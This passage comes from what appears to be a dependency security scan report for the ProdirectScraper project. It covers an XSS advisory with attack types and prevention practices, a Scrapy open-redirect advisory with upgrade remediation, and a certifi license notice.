The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade Twisted to version 24.7.0rc1 or higher.

References

medium severity

URL Redirection to Untrusted Site ('Open Redirect')

  • Vulnerable module: scrapy
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2
    Remediation: Upgrade to scrapy@2.11.2.

Overview

Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Affected versions of this package are vulnerable to URL Redirection to Untrusted Site ('Open Redirect') due to the improper handling of scheme-specific proxy settings during HTTP redirects. An attacker can potentially intercept sensitive information by exploiting the failure to switch proxies when redirected from HTTP to HTTPS URLs or vice versa.

Remediation

Upgrade Scrapy to version 2.11.2 or higher.

References

medium severity
new

MPL-2.0 license

  • Module: certifi
  • Introduced through: scrapy@1.8.2

Detailed paths

  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 tldextract@4.0.0 requests@2.31.0 certifi@2025.1.31
  • Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a scrapy@1.8.2 tldextract@4.0.0 requests-file@2.1.0 requests@2.31.0 certifi@2025.1.31

MPL-2.0 license